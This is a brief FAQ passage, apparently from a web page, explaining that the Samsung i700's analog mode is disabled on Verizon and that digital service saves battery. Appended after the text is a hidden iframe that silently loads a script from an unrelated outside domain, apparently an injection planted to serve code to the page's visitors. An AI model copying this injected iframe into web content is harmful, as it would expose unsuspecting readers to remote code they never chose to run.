Does the i700 work as an analog phone?

This is a complicated question. The phone, according to Samsung's specs, is capable of being used as an analog phone. Thus far, only Verizon has released the phone and they have disabled the analog portion. So, the answer for Verizon is no. For Verizon customers, this is a short term annoyance as they are planning to move all their towers to digital in the not to distant future. This is actually good if you don't need analog, as digital takes a lot less power and will help conserve battery life.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
